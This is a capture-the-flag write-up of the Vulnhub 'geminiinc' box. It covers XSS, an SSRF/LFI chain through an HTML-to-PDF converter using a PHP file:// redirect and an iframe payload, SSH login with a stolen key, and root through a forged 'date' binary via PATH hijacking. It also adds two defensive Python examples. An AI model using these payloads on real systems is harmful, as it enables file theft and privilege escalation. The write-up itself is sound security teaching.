Vulnhub geminiinc
2022-07-03 11:47:00 【Plum_Flowers_seven】
1. Host discovery
Half-open (SYN) scan:
nmap -sS ip
2. Service version detection
3. Information gathering
1. Page does not load
The resources on port 80 do not load correctly, because the page pulls assets from some Google sites; route the browser through a proxy to view it.
2. Main page
The page gives us the address of the source code.
3. Source code
Looking through the files one by one, the install folder contains the login [email protected]
4. Try logging in
Login succeeds, and more functions appear in the upper left corner.
4. Function analysis
1. export: outputs a PDF
2. edit profile: edits the profile
Whatever we change is displayed unchanged on the profile board; the user name field is not filtered.
5. Stored XSS
On its own this is not enough to break out of the application.
6. Information gathering
1. export output
The document properties of the exported PDF reveal the generator: it is just an HTML-to-PDF application.
7. Chaining XSS + SSRF + LFI
A search shows that this application component is affected by all three of these vulnerabilities. Combining them lets us read local files.
1. Start a local Apache service
systemctl start apache2
cd /var/www/html
sudo vim 1.php
Create the 1.php file and write in it:
<?php
// Redirects the converter's fetch to the local path supplied in ?file=
$file = $_GET['file'];
header("location:file://$file");
2. Inject the payload
<iframe src="http://ip/1.php?file=/etc/passwd" width="100%" height=1220></iframe>
3. Trigger with export
The /etc/passwd file is read successfully. It shows that gemini has a login shell.
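The chain above works only because the HTML-to-PDF converter fetches whatever an iframe points at and then follows a redirect to a file:// URL. The mitigation on the converter side is a per-hop policy: allow only http/https, allow only hosts that resolve to public addresses, and re-check after every redirect instead of trusting the first URL. The following is an added example of that policy, not code from the write-up or from the application it describes; the fetch function, the hostnames, the IP table and the sample "network" are all constructed so it runs offline.

```python
"""Redirect-aware URL policy for a server-side HTML-to-PDF converter.
Added example; the hostnames, FAKE_DNS, FAKE_NET and fake_fetch are constructed."""
import ipaddress
import re
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"http", "https"}
MAX_REDIRECTS = 5

# Constructed hostname -> IP table standing in for DNS resolution.
FAKE_DNS = {
    "cdn.example.com": "5.6.7.8",          # constructed public address
    "attacker.example.net": "9.8.7.6",     # constructed public address
    "localhost": "127.0.0.1",
}

def url_allowed(url):
    """Return (ok, reason). Rejects non-http(s) schemes (file://, gopher://, ...)
    and hosts that resolve to loopback, private, link-local or reserved ranges."""
    p = urlparse(url)
    if p.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {p.scheme!r} not allowed"
    if not p.hostname:
        return False, "missing host"
    ip = FAKE_DNS.get(p.hostname)  # real code: socket.getaddrinfo, check every A/AAAA record
    if ip is None:
        return False, f"unresolvable host {p.hostname!r}"
    addr = ipaddress.ip_address(ip)
    if addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_reserved:
        return False, f"host {p.hostname!r} resolves to non-public {ip}"
    return True, "ok"

def fetch_with_policy(url, fetch):
    """Follow redirects manually, re-validating each hop. `fetch(url)` returns
    (status, location_or_body). Returns (body, None) or (None, reason)."""
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = url_allowed(url)
        if not ok:
            return None, f"blocked {url}: {reason}"
        status, payload = fetch(url)
        if status in (301, 302, 303, 307, 308):
            url = payload  # the next hop is checked at the top of the loop
            continue
        return payload, None
    return None, "too many redirects"

SRC_RE = re.compile(r'<(?:iframe|img|link|script)[^>]*?(?:src|href)="([^"]*)"', re.I)

def render_html(html, fetch):
    """Collect every sub-resource the converter would load, fetch it through the
    policy, and return a dict url -> body (or the reason it was blocked)."""
    results = {}
    for url in SRC_RE.findall(html):
        body, err = fetch_with_policy(url, fetch)
        results[url] = body if err is None else err
    return results

# Constructed 'network': the write-up's redirect script next to a benign CDN asset.
FAKE_NET = {
    "http://cdn.example.com/logo.png": (200, "PNG..."),
    "http://attacker.example.net/1.php?file=/etc/passwd": (302, "file:///etc/passwd"),
    "http://localhost/": (200, "internal page"),
}

def fake_fetch(url):
    """Constructed stand-in for an HTTP client."""
    return FAKE_NET.get(url, (404, ""))

if __name__ == "__main__":
    page = ('<img src="http://cdn.example.com/logo.png">'
            '<iframe src="http://attacker.example.net/1.php?file=/etc/passwd"></iframe>'
            '<iframe src="http://localhost/"></iframe>'
            '<iframe src="file:///etc/shadow"></iframe>')
    for url, outcome in render_html(page, fake_fetch).items():
        print(url, "->", outcome)
```

The benign CDN image is fetched, the direct file:// iframe and the localhost iframe are refused before any request is made, and the redirect trick from the write-up is stopped at the second hop, where the Location header points at file:///etc/passwd. Checking the URL once before the first request, which is what many converters do, would have let that hop through.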
8. Read gemini's private key
1. Save the key on Kali
2. SSH public/private key login
Login succeeds.
9. Searching with find
find / -type f -user root -perm -u+xs -ls 2>/dev/null
10. Inspecting the binary
1. Analysis of the /usr/bin/listinfo file
strings /usr/bin/listinfo
Content:
The core of it is these lines: they call a system command.
2. Execution
11. Forging the system command file
1. Create a new date file
vim date.c
Content:
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

/* Forged "date": listinfo runs setuid root and calls the command by its bare
   name, so this file, found first in PATH, runs in its place. */
int main(void) {
    setuid(0);
    setgid(0);
    system("/bin/bash");
    return 0;
}
2. Modify the environment variable
PATH is searched from front to back, so /tmp goes first:
export PATH=/tmp:$PATH
3. Run listinfo
Privilege escalation succeeds.
Get flag.txt
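Sections 10 and 11 together describe the root cause: a setuid binary that shells out to a command by its bare name, so the caller's PATH decides which file runs. The following is an added audit helper, not code from the write-up or from the box: it pulls command-looking strings out of `strings` output and flags those that are not absolute paths, and it mimics the shell's left-to-right PATH lookup against a directory layout to show which file wins. The `strings` sample and the directory layout are constructed; the real listinfo output is not reproduced.

```python
"""Audit helper for setuid binaries that call commands by relative name.
Added example; SAMPLE_STRINGS and SAMPLE_LAYOUT are constructed."""
import os
import shlex

# Program names a setuid binary commonly shells out to; the audit only cares
# whether they appear unqualified. Extend the set for your environment.
KNOWN_COMMANDS = {"date", "uname", "ls", "cat", "id", "whoami", "ps", "netstat", "ifconfig", "ip"}

def shell_strings(strings_output):
    """Yield (line, argv) for lines of `strings` output that look like shell commands."""
    for line in strings_output.splitlines():
        line = line.strip()
        try:
            argv = shlex.split(line)
        except ValueError:  # unbalanced quotes: not a command string we care about
            continue
        if argv and os.path.basename(argv[0]) in KNOWN_COMMANDS:
            yield line, argv

def relative_commands(strings_output):
    """Return the command strings whose program is not given as an absolute path."""
    return [line for line, argv in shell_strings(strings_output)
            if not argv[0].startswith("/")]

def resolve(name, path, layout):
    """Mimic the shell's lookup: the first PATH directory that contains `name`
    wins. `layout` maps directory -> set of executable names present there."""
    for d in path.split(":"):
        if name in layout.get(d, set()):
            return os.path.join(d, name)
    return None

# Constructed stand-in for `strings /usr/bin/listinfo` output.
SAMPLE_STRINGS = """\
/lib64/ld-linux-x86-64.so.2
libc.so.6
date
uname -a
/bin/cat /etc/hostname
GCC: (Debian 8.3.0-6) 8.3.0
"""

# Constructed directory layout: system directories plus a world-writable /tmp.
SAMPLE_LAYOUT = {
    "/usr/bin": {"date", "uname", "id"},
    "/bin": {"cat", "date"},
    "/tmp": {"date"},   # a forged 'date' dropped by an unprivileged local user
}

if __name__ == "__main__":
    for cmd in relative_commands(SAMPLE_STRINGS):
        print("relative command in setuid binary:", repr(cmd))
    print("default PATH resolves date to:", resolve("date", "/usr/bin:/bin", SAMPLE_LAYOUT))
    print("PATH=/tmp:... resolves date to:", resolve("date", "/tmp:/usr/bin:/bin", SAMPLE_LAYOUT))
```

Running it over the constructed sample reports `date` and `uname -a` as unqualified while `/bin/cat /etc/hostname` passes, and shows the same name resolving to /usr/bin/date under the default PATH but to /tmp/date once /tmp is prepended. The fix on the binary's side is to call commands by absolute path and to set PATH (or the whole environment) explicitly before any system() or exec call rather than inheriting it from the caller; the same helper, fed real `strings` output from the binaries returned by the find command in section 9, is a quick way to check an installed system for the pattern.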